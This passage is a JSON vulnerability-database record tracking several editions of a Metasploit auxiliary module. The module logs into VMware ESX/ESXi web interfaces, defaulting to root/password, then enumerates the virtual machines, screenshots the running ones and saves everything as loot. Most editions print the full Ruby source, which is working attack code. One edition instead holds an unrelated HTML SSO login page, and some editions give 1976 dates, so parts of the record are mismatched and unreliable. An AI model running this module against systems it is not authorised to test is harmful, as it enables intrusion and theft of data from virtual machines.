[{"type": "avleonov", "idList": ["AVLEONOV:3A8521BFB3F8C5B46C04F0C82A0F2DC1"]}, {"type": "talosblog", "idList": ["TALOSBLOG:D1788B89D8B17C5C6DB6F32CC37734F7"]}, {"type": "exploitdb", "idList": ["EDB-ID:46334"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310891670", "OPENVAS:1361412562310891669", "OPENVAS:1361412562310891666", "OPENVAS:1361412562310141985", "OPENVAS:1361412562310704388"]}, {"type": "kitploit", "idList": ["KITPLOIT:9165290622393060450"]}, {"type": "cve", "idList": ["CVE-2018-13792", "CVE-2019-7673", "CVE-2019-7677", "CVE-2009-5154", "CVE-2019-7676", "CVE-2019-7674", "CVE-2019-7678", "CVE-2019-7675", "CVE-2019-7684", "CVE-2019-7664"]}, {"type": "nmap", "idList": ["NMAP:UBIQUITI-DISCOVERY.NSE"]}], "modified": "2018-01-29T22:11:10"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/vmware/vmware_enum_vms.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n include Msf::Exploit::Remote::VIMSoap\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'VMWare Enumerate Virtual Machines',\n 'Description' => %Q{\n This module attempts to discover virtual machines on any VMWare instance\n running the web interface. This would include ESX/ESXi and VMWare Server.\n },\n 'Author' => ['theLightCosine'],\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => { 'SSL' => true }\n )\n\n register_options(\n [\n Opt::RPORT(443),\n OptString.new('USERNAME', [ true, \"The username to Authenticate with.\", 'root' ]),\n OptString.new('PASSWORD', [ true, \"The password to Authenticate with.\", 'password' ]),\n OptBool.new('SCREENSHOT', [true, \"Wheter or not to try to take a screenshot\", true])\n ])\n end\n\n def run_host(ip)\n\n if vim_do_login(datastore['USERNAME'], datastore['PASSWORD']) == :success\n virtual_machines = vim_get_vms\n virtual_machines.each do |vm|\n print_good YAML.dump(vm)\n report_note(\n :host => rhost,\n :type => \"vmware.esx.vm\",\n :data => vm,\n :port => rport,\n :proto => 'tcp',\n :update => :unique_data\n )\n next unless datastore['SCREENSHOT'] and vm['runtime']['powerState'] == 'poweredOn'\n print_status \"Attempting to take screenshot of #{vm['name']}....\"\n screenshot = vim_take_screenshot(vm, datastore['USERNAME'], datastore['PASSWORD'] )\n case screenshot\n when :error\n print_error \"Screenshot failed\"\n next\n when :expired\n vim_do_login(datastore['USERNAME'], datastore['PASSWORD'])\n retry_result = vim_take_screenshot(vm, datastore['USERNAME'], datastore['PASSWORD'] )\n if retry_result == :error or retry_result == :expired\n print_error \"Screenshot failed\"\n else\n ss_path = store_loot(\"host.vmware.screenshot\", \"image/png\", datastore['RHOST'], retry_result, \"#{vm['name']}_screenshot.png\", \"Screenshot of VM #{vm['name']}\")\n print_good \"Screenshot Saved to #{ss_path}\"\n end\n else\n ss_path = store_loot(\"host.vmware.screenshot\", \"image/png\", datastore['RHOST'], screenshot, \"screenshot.png\", \"Screenshot of VM #{vm['name']}\")\n print_good \"Screenshot Saved to #{ss_path}\"\n end\n end\n\n f = store_loot('host.vmware.vms', \"text/plain\", datastore['RHOST'], YAML.dump(virtual_machines) , \"#{datastore['RHOST']}_esx_vms.txt\", \"VMWare ESX Virtual Machines\")\n vprint_good(\"VM info stored in: #{f}\")\n else\n print_error \"Login Failure on #{ip}\"\n return\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/vmware/vmware_enum_vms.rb"}, "lastseen": "2018-01-29T22:11:10", "differentElements": ["sourceData"], "edition": 9}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/VMWARE/VMWARE_ENUM_VMS", "hash": "608377ee52babc89baa2a9083699cc5d", "type": "metasploit", "bulletinFamily": "exploit", "title": "VMWare Enumerate Virtual Machines", "description": "This module attempts to discover virtual machines on any VMWare instance running the web interface. This would include ESX/ESXi and VMWare Server.", "published": "2012-02-13T18:07:28", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-04-07T23:13:26", "history": [], "viewCount": 6, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "kitploit", "idList": ["KITPLOIT:3115278411447871089"]}, {"type": "cve", "idList": ["CVE-2019-10906", "CVE-2019-10904", "CVE-2019-10905", "CVE-2019-9490", "CVE-2019-9489", "CVE-2019-10478", "CVE-2019-6552", "CVE-2019-6550", "CVE-2019-6554", "CVE-2019-10479"]}, {"type": "zdt", "idList": ["1337DAY-ID-32494"]}, {"type": "threatpost", "idList": ["THREATPOST:A584E3ED4239CD6CF484C0B5869C4A4E"]}], "modified": "2019-04-07T23:13:26"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/vmware/vmware_enum_vms.rb", "sourceData": "<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\">\n<html>\n\t<head>\n\t\t<title>sso login check</title>\n\t\t\n\t\t<meta charset=\"utf-8\"/>\n\t\t<meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge\" />\n\t\t<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\" />\n\t\t<meta http-equiv=\"CACHE-CONTROL\" content=\"NO-CACHE\" />\n\t\t<meta http-equiv=\"PRAGMA\" content=\"NO-CACHE\" />\n\t\t<meta http-equiv=\"EXPIRES\" content=\"0\" />\n\t</head>\n \t<body>\n \t<script src=\"http://127.0.0.1:12381/auth\" language=\"javascript\" type=\"text/javascript\"></script> \n\t\t<script language=\"javascript\" type=\"text/javascript\">\n\t\t\tfunction getOrigURLParamValue() \n\t\t\t{\n\t\t\t\tvar orig_url_param = 'orig_url=';\n\t\t\t\tvar decodedUrlParameters = decodeURIComponent(location.search);\n\t\t\t\tvar decodedOrigParam = (new RegExp(orig_url_param + '.*').exec(decodedUrlParameters)||[,\"\"])[0].replace(orig_url_param, '').replace(/\\+/g, '%20')||null;\n\t\t\t\tvar encodedOrigParam = encodeURIComponent(decodedOrigParam);\n\n\t\t\t\t//console.log('Decoded URL Params: ' + decodedUrlParameters);\n\t\t\t\t//console.log('decodedOrigParam: ' + decodedOrigParam);\n\t\t\t\t//console.log('encodedOrigParam: ' + encodedOrigParam);\n\n\t\t\t\treturn encodedOrigParam;\n\n\t\t\t}\n\n\t\t\tfunction empty(str)\n\t\t\t{\t\n\t\t\t\treturn !str || !/[^\\s]+/.test(str);\n\t\t\t}\n\t\t\t\n\t\t\tvar encodedOrigUrl = getOrigURLParamValue();\n\t\t\t\n\t\t\ttry\n\t\t\t{\n\t\t\t\tif(typeof(gCtchLogonInfo) !== 'undefined')\n\t\t\t\t{\t \t\n\t\t\t\t\tvar modified_redirect_url = \"https://\" + window.location.hostname +'/EUP/transparent_login/?orig_url=' + encodedOrigUrl + '&winUserId=' +gCtchLogonInfo.winUserId ;\n\t\t\t\t\tif (!empty(gCtchLogonInfo.orgName))\n\t\t\t\t\t{\n\t\t\t\t\t\tmodified_redirect_url = modified_redirect_url.concat(\"&orgName=\",gCtchLogonInfo.orgName);\n\t\t\t\t\t}\n\t\t\t\t\tif (!empty(gCtchLogonInfo.userName))\n\t\t\t\t\t{\n\t\t\t\t\t\tmodified_redirect_url = modified_redirect_url.concat(\"&userName=\",gCtchLogonInfo.userName);\n\t\t\t\t\t}\n\t\t\t\t\t\n\t\t\t\t\tdocument.location.href = modified_redirect_url;\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\tdocument.location.href = \"https://\" + window.location.hostname + '/EUP/login?orig_url=' + encodedOrigUrl;\n\t\t\t\t}\n\t\t\t}\n\t\t\tcatch(e)\n\t\t\t{\n\t\t\t\tdocument.location.href = \"https://\" + window.location.hostname + '/EUP/login?orig_url='+ encodedOrigUrl;\n\t\t\t}\n\t\t</script> \n\n\t</body> \n</html>\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/vmware/vmware_enum_vms.rb"}, "lastseen": "2019-04-07T23:13:26", "differentElements": ["sourceData"], "edition": 10}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/VMWARE/VMWARE_ENUM_VMS", "hash": "8369b2c53fa14b26ef02015e573f5964", "type": "metasploit", "bulletinFamily": "exploit", "title": "VMWare Enumerate Virtual Machines", "description": "This module attempts to discover virtual machines on any VMWare instance running the web interface. This would include ESX/ESXi and VMWare Server.", "published": "2012-02-13T18:07:28", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-04-08T03:10:10", "history": [], "viewCount": 6, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "kitploit", "idList": ["KITPLOIT:3115278411447871089"]}, {"type": "cve", "idList": ["CVE-2019-10906", "CVE-2019-10904", "CVE-2019-10905", "CVE-2019-9489", "CVE-2019-9490", "CVE-2019-10478", "CVE-2019-6552", "CVE-2019-6550", "CVE-2019-6554", "CVE-2019-10479"]}, {"type": "zdt", "idList": ["1337DAY-ID-32494"]}, {"type": "threatpost", "idList": ["THREATPOST:A584E3ED4239CD6CF484C0B5869C4A4E"]}], "modified": "2019-04-08T03:10:10"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/vmware/vmware_enum_vms.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n include Msf::Exploit::Remote::VIMSoap\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'VMWare Enumerate Virtual Machines',\n 'Description' => %Q{\n This module attempts to discover virtual machines on any VMWare instance\n running the web interface. This would include ESX/ESXi and VMWare Server.\n },\n 'Author' => ['theLightCosine'],\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => { 'SSL' => true }\n )\n\n register_options(\n [\n Opt::RPORT(443),\n OptString.new('USERNAME', [ true, \"The username to Authenticate with.\", 'root' ]),\n OptString.new('PASSWORD', [ true, \"The password to Authenticate with.\", 'password' ]),\n OptBool.new('SCREENSHOT', [true, \"Wheter or not to try to take a screenshot\", true])\n ])\n end\n\n def run_host(ip)\n\n if vim_do_login(datastore['USERNAME'], datastore['PASSWORD']) == :success\n virtual_machines = vim_get_vms\n virtual_machines.each do |vm|\n print_good YAML.dump(vm)\n report_note(\n :host => rhost,\n :type => \"vmware.esx.vm\",\n :data => vm,\n :port => rport,\n :proto => 'tcp',\n :update => :unique_data\n )\n next unless datastore['SCREENSHOT'] and vm['runtime']['powerState'] == 'poweredOn'\n print_status \"Attempting to take screenshot of #{vm['name']}....\"\n screenshot = vim_take_screenshot(vm, datastore['USERNAME'], datastore['PASSWORD'] )\n case screenshot\n when :error\n print_error \"Screenshot failed\"\n next\n when :expired\n vim_do_login(datastore['USERNAME'], datastore['PASSWORD'])\n retry_result = vim_take_screenshot(vm, datastore['USERNAME'], datastore['PASSWORD'] )\n if retry_result == :error or retry_result == :expired\n print_error \"Screenshot failed\"\n else\n ss_path = store_loot(\"host.vmware.screenshot\", \"image/png\", datastore['RHOST'], retry_result, \"#{vm['name']}_screenshot.png\", \"Screenshot of VM #{vm['name']}\")\n print_good \"Screenshot Saved to #{ss_path}\"\n end\n else\n ss_path = store_loot(\"host.vmware.screenshot\", \"image/png\", datastore['RHOST'], screenshot, \"screenshot.png\", \"Screenshot of VM #{vm['name']}\")\n print_good \"Screenshot Saved to #{ss_path}\"\n end\n end\n\n f = store_loot('host.vmware.vms', \"text/plain\", datastore['RHOST'], YAML.dump(virtual_machines) , \"#{datastore['RHOST']}_esx_vms.txt\", \"VMWare ESX Virtual Machines\")\n vprint_good(\"VM info stored in: #{f}\")\n else\n print_error \"Login Failure on #{ip}\"\n return\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/vmware/vmware_enum_vms.rb"}, "lastseen": "2019-04-08T03:10:10", "differentElements": ["modified", "published"], "edition": 11}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/VMWARE/VMWARE_ENUM_VMS", "hash": "799a51ff0e0731a578523d8961d9c38a", "type": "metasploit", "bulletinFamily": "exploit", "title": "VMWare Enumerate Virtual Machines", "description": "This module attempts to discover virtual machines on any VMWare instance running the web interface. This would include ESX/ESXi and VMWare Server.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-04-28T20:56:22", "history": [], "viewCount": 6, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-32604"]}, {"type": "cve", "idList": ["CVE-2019-11576", "CVE-2019-11567", "CVE-2019-11568", "CVE-2019-11565", "CVE-2019-11555", "CVE-2019-11557", "CVE-2019-11492", "CVE-2019-3844", "CVE-2019-11533", "CVE-2019-3843"]}], "modified": "2019-04-28T20:56:22"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/vmware/vmware_enum_vms.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n include Msf::Exploit::Remote::VIMSoap\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'VMWare Enumerate Virtual Machines',\n 'Description' => %Q{\n This module attempts to discover virtual machines on any VMWare instance\n running the web interface. This would include ESX/ESXi and VMWare Server.\n },\n 'Author' => ['theLightCosine'],\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => { 'SSL' => true }\n )\n\n register_options(\n [\n Opt::RPORT(443),\n OptString.new('USERNAME', [ true, \"The username to Authenticate with.\", 'root' ]),\n OptString.new('PASSWORD', [ true, \"The password to Authenticate with.\", 'password' ]),\n OptBool.new('SCREENSHOT', [true, \"Wheter or not to try to take a screenshot\", true])\n ])\n end\n\n def run_host(ip)\n\n if vim_do_login(datastore['USERNAME'], datastore['PASSWORD']) == :success\n virtual_machines = vim_get_vms\n virtual_machines.each do |vm|\n print_good YAML.dump(vm)\n report_note(\n :host => rhost,\n :type => \"vmware.esx.vm\",\n :data => vm,\n :port => rport,\n :proto => 'tcp',\n :update => :unique_data\n )\n next unless datastore['SCREENSHOT'] and vm['runtime']['powerState'] == 'poweredOn'\n print_status \"Attempting to take screenshot of #{vm['name']}....\"\n screenshot = vim_take_screenshot(vm, datastore['USERNAME'], datastore['PASSWORD'] )\n case screenshot\n when :error\n print_error \"Screenshot failed\"\n next\n when :expired\n vim_do_login(datastore['USERNAME'], datastore['PASSWORD'])\n retry_result = vim_take_screenshot(vm, datastore['USERNAME'], datastore['PASSWORD'] )\n if retry_result == :error or retry_result == :expired\n print_error \"Screenshot failed\"\n else\n ss_path = store_loot(\"host.vmware.screenshot\", \"image/png\", datastore['RHOST'], retry_result, \"#{vm['name']}_screenshot.png\", \"Screenshot of VM #{vm['name']}\")\n print_good \"Screenshot Saved to #{ss_path}\"\n end\n else\n ss_path = store_loot(\"host.vmware.screenshot\", \"image/png\", datastore['RHOST'], screenshot, \"screenshot.png\", \"Screenshot of VM #{vm['name']}\")\n print_good \"Screenshot Saved to #{ss_path}\"\n end\n end\n\n f = store_loot('host.vmware.vms', \"text/plain\", datastore['RHOST'], YAML.dump(virtual_machines) , \"#{datastore['RHOST']}_esx_vms.txt\", \"VMWare ESX Virtual Machines\")\n vprint_good(\"VM info stored in: #{f}\")\n else\n print_error \"Login Failure on #{ip}\"\n return\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/vmware/vmware_enum_vms.rb"}, "lastseen": "2019-04-28T20:56:22", "differentElements": ["modified", "published"], "edition": 12}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/VMWARE/VMWARE_ENUM_VMS", "hash": "8369b2c53fa14b26ef02015e573f5964", "type": "metasploit", "bulletinFamily": "exploit", "title": "VMWare Enumerate Virtual Machines", "description": "This module attempts to discover virtual machines on any VMWare instance running the web interface. This would include ESX/ESXi and VMWare Server.", "published": "2012-02-13T18:07:28", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-04-29T00:48:28", "history": [], "viewCount": 6, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-32604", "1337DAY-ID-32603"]}, {"type": "cve", "idList": ["CVE-2019-11576", "CVE-2019-11567", "CVE-2019-11568", "CVE-2019-11565", "CVE-2019-11555", "CVE-2019-11557", "CVE-2019-11492", "CVE-2019-11533", "CVE-2019-3844", "CVE-2019-3843"]}], "modified": "2019-04-29T00:48:28"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/vmware/vmware_enum_vms.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n include Msf::Exploit::Remote::VIMSoap\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'VMWare Enumerate Virtual Machines',\n 'Description' => %Q{\n This module attempts to discover virtual machines on any VMWare instance\n running the web interface. This would include ESX/ESXi and VMWare Server.\n },\n 'Author' => ['theLightCosine'],\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => { 'SSL' => true }\n )\n\n register_options(\n [\n Opt::RPORT(443),\n OptString.new('USERNAME', [ true, \"The username to Authenticate with.\", 'root' ]),\n OptString.new('PASSWORD', [ true, \"The password to Authenticate with.\", 'password' ]),\n OptBool.new('SCREENSHOT', [true, \"Wheter or not to try to take a screenshot\", true])\n ])\n end\n\n def run_host(ip)\n\n if vim_do_login(datastore['USERNAME'], datastore['PASSWORD']) == :success\n virtual_machines = vim_get_vms\n virtual_machines.each do |vm|\n print_good YAML.dump(vm)\n report_note(\n :host => rhost,\n :type => \"vmware.esx.vm\",\n :data => vm,\n :port => rport,\n :proto => 'tcp',\n :update => :unique_data\n )\n next unless datastore['SCREENSHOT'] and vm['runtime']['powerState'] == 'poweredOn'\n print_status \"Attempting to take screenshot of #{vm['name']}....\"\n screenshot = vim_take_screenshot(vm, datastore['USERNAME'], datastore['PASSWORD'] )\n case screenshot\n when :error\n print_error \"Screenshot failed\"\n next\n when :expired\n vim_do_login(datastore['USERNAME'], datastore['PASSWORD'])\n retry_result = vim_take_screenshot(vm, datastore['USERNAME'], datastore['PASSWORD'] )\n if retry_result == :error or retry_result == :expired\n print_error \"Screenshot failed\"\n else\n ss_path = store_loot(\"host.vmware.screenshot\", \"image/png\", datastore['RHOST'], retry_result, \"#{vm['name']}_screenshot.png\", \"Screenshot of VM #{vm['name']}\")\n print_good \"Screenshot Saved to #{ss_path}\"\n end\n else\n ss_path = store_loot(\"host.vmware.screenshot\", \"image/png\", datastore['RHOST'], screenshot, \"screenshot.png\", \"Screenshot of VM #{vm['name']}\")\n print_good \"Screenshot Saved to #{ss_path}\"\n end\n end\n\n f = store_loot('host.vmware.vms', \"text/plain\", datastore['RHOST'], YAML.dump(virtual_machines) , \"#{datastore['RHOST']}_esx_vms.txt\", \"VMWare ESX Virtual Machines\")\n vprint_good(\"VM info stored in: #{f}\")\n else\n print_error \"Login Failure on #{ip}\"\n return\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/vmware/vmware_enum_vms.rb"}, "lastseen": "2019-04-29T00:48:28", "differentElements": ["modified", "published"], "edition": 13}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/VMWARE/VMWARE_ENUM_VMS", "hash": "799a51ff0e0731a578523d8961d9c38a", "type": "metasploit", "bulletinFamily": "exploit", "title": "VMWare Enumerate Virtual Machines", "description": "This module attempts to discover virtual machines on any VMWare instance running the web interface. This would include ESX/ESXi and VMWare Server.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-04-30T00:56:27", "history": [], "viewCount": 6, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "kitploit", "idList": ["KITPLOIT:1124145439708175343"]}, {"type": "avleonov", "idList": ["AVLEONOV:0D727D674306BFF09857E43E17203AD8"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310704436", "OPENVAS:1361412562310891769", "OPENVAS:1361412562310891770", "OPENVAS:1361412562310891768", "OPENVAS:1361412562310704435", "OPENVAS:1361412562310891767", "OPENVAS:1361412562310891766"]}, {"type": "cve", "idList": ["CVE-2019-11578", "CVE-2019-11577", "CVE-2019-11579", "CVE-2019-11576", "CVE-2019-11567", "CVE-2019-11565", "CVE-2019-11568", "CVE-2019-11555", "CVE-2019-11557"]}, {"type": "zdt", "idList": ["1337DAY-ID-32604", "1337DAY-ID-32603"]}], "modified": "2019-04-30T00:56:27"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/vmware/vmware_enum_vms.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n include Msf::Exploit::Remote::VIMSoap\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'VMWare Enumerate Virtual Machines',\n 'Description' => %Q{\n This module attempts to discover virtual machines on any VMWare instance\n running the web interface. This would include ESX/ESXi and VMWare Server.\n },\n 'Author' => ['theLightCosine'],\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => { 'SSL' => true }\n )\n\n register_options(\n [\n Opt::RPORT(443),\n OptString.new('USERNAME', [ true, \"The username to Authenticate with.\", 'root' ]),\n OptString.new('PASSWORD', [ true, \"The password to Authenticate with.\", 'password' ]),\n OptBool.new('SCREENSHOT', [true, \"Wheter or not to try to take a screenshot\", true])\n ])\n end\n\n def run_host(ip)\n\n if vim_do_login(datastore['USERNAME'], datastore['PASSWORD']) == :success\n virtual_machines = vim_get_vms\n virtual_machines.each do |vm|\n print_good YAML.dump(vm)\n report_note(\n :host => rhost,\n :type => \"vmware.esx.vm\",\n :data => vm,\n :port => rport,\n :proto => 'tcp',\n :update => :unique_data\n )\n next unless datastore['SCREENSHOT'] and vm['runtime']['powerState'] == 'poweredOn'\n print_status \"Attempting to take screenshot of #{vm['name']}....\"\n screenshot = vim_take_screenshot(vm, datastore['USERNAME'], datastore['PASSWORD'] )\n case screenshot\n when :error\n print_error \"Screenshot failed\"\n next\n when :expired\n vim_do_login(datastore['USERNAME'], datastore['PASSWORD'])\n retry_result = vim_take_screenshot(vm, datastore['USERNAME'], datastore['PASSWORD'] )\n if retry_result == :error or retry_result == :expired\n print_error \"Screenshot failed\"\n else\n ss_path = store_loot(\"host.vmware.screenshot\", \"image/png\", datastore['RHOST'], retry_result, \"#{vm['name']}_screenshot.png\", \"Screenshot of VM #{vm['name']}\")\n print_good \"Screenshot Saved to #{ss_path}\"\n end\n else\n ss_path = store_loot(\"host.vmware.screenshot\", \"image/png\", datastore['RHOST'], screenshot, \"screenshot.png\", \"Screenshot of VM #{vm['name']}\")\n print_good \"Screenshot Saved to #{ss_path}\"\n end\n end\n\n f = store_loot('host.vmware.vms', \"text/plain\", datastore['RHOST'], YAML.dump(virtual_machines) , \"#{datastore['RHOST']}_esx_vms.txt\", \"VMWare ESX Virtual Machines\")\n vprint_good(\"VM info stored in: #{f}\")\n else\n print_error \"Login Failure on #{ip}\"\n return\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/vmware/vmware_enum_vms.rb"}, "lastseen": "2019-04-30T00:56:27", "differentElements": ["modified", "published"], "edition": 14}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/VMWARE/VMWARE_ENUM_VMS", "hash": "8369b2c53fa14b26ef02015e573f5964", "type": "metasploit", "bulletinFamily": "exploit", "title": "VMWare Enumerate Virtual Machines", "description": "This module attempts to discover virtual machines on any VMWare instance running the web interface. This would include ESX/ESXi and VMWare Server.", "published": "2012-02-13T18:07:28", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-04-30T02:55:38", "history": [], "viewCount": 6, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "kitploit", "idList": ["KITPLOIT:1124145439708175343"]}, {"type": "avleonov", "idList": ["AVLEONOV:0D727D674306BFF09857E43E17203AD8"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310891770", "OPENVAS:1361412562310891769", "OPENVAS:1361412562310704436", "OPENVAS:1361412562310891768", "OPENVAS:1361412562310704435", "OPENVAS:1361412562310891767", "OPENVAS:1361412562310891766"]}, {"type": "cve", "idList": ["CVE-2019-11577", "CVE-2019-11579", "CVE-2019-11578", "CVE-2019-11576", "CVE-2019-11567", "CVE-2019-11565", "CVE-2019-11568", "CVE-2019-11555", "CVE-2019-11557"]}, {"type": "zdt", "idList": ["1337DAY-ID-32604", "1337DAY-ID-32603"]}], "modified": "2019-04-30T02:55:38"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/vmware/vmware_enum_vms.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n include Msf::Exploit::Remote::VIMSoap\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'VMWare Enumerate Virtual Machines',\n 'Description' => %Q{\n This module attempts to discover virtual machines on any VMWare instance\n running the web interface. This would include ESX/ESXi and VMWare Server.\n },\n 'Author' => ['theLightCosine'],\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => { 'SSL' => true }\n )\n\n register_options(\n [\n Opt::RPORT(443),\n OptString.new('USERNAME', [ true, \"The username to Authenticate with.\", 'root' ]),\n OptString.new('PASSWORD', [ true, \"The password to Authenticate with.\", 'password' ]),\n OptBool.new('SCREENSHOT', [true, \"Wheter or not to try to take a screenshot\", true])\n ])\n end\n\n def run_host(ip)\n\n if vim_do_login(datastore['USERNAME'], datastore['PASSWORD']) == :success\n virtual_machines = vim_get_vms\n virtual_machines.each do |vm|\n print_good YAML.dump(vm)\n report_note(\n :host => rhost,\n :type => \"vmware.esx.vm\",\n :data => vm,\n :port => rport,\n :proto => 'tcp',\n :update => :unique_data\n )\n next unless datastore['SCREENSHOT'] and vm['runtime']['powerState'] == 'poweredOn'\n print_status \"Attempting to take screenshot of #{vm['name']}....\"\n screenshot = vim_take_screenshot(vm, datastore['USERNAME'], datastore['PASSWORD'] )\n case screenshot\n when :error\n print_error \"Screenshot failed\"\n next\n when :expired\n vim_do_login(datastore['USERNAME'], datastore['PASSWORD'])\n retry_result = vim_take_screenshot(vm, datastore['USERNAME'], datastore['PASSWORD'] )\n if retry_result == :error or retry_result == :expired\n print_error \"Screenshot failed\"\n else\n ss_path = store_loot(\"host.vmware.screenshot\", \"image/png\", datastore['RHOST'], retry_result, \"#{vm['name']}_screenshot.png\", \"Screenshot of VM #{vm['name']}\")\n print_good \"Screenshot Saved to #{ss_path}\"\n end\n else\n ss_path = store_loot(\"host.vmware.screenshot\", \"image/png\", datastore['RHOST'], screenshot, \"screenshot.png\", \"Screenshot of VM #{vm['name']}\")\n print_good \"Screenshot Saved to #{ss_path}\"\n end\n end\n\n f = store_loot('host.vmware.vms', \"text/plain\", datastore['RHOST'], YAML.dump(virtual_machines) , \"#{datastore['RHOST']}_esx_vms.txt\", \"VMWare ESX Virtual Machines\")\n vprint_good(\"VM info stored in: #{f}\")\n else\n print_error \"Login Failure on #{ip}\"\n return\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/vmware/vmware_enum_vms.rb"}, "lastseen": "2019-04-30T02:55:38", "differentElements": ["description", "metasploitHistory", "metasploitReliability", "sourceHref"], "edition": 15}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/VMWARE/VMWARE_ENUM_VMS", "hash": 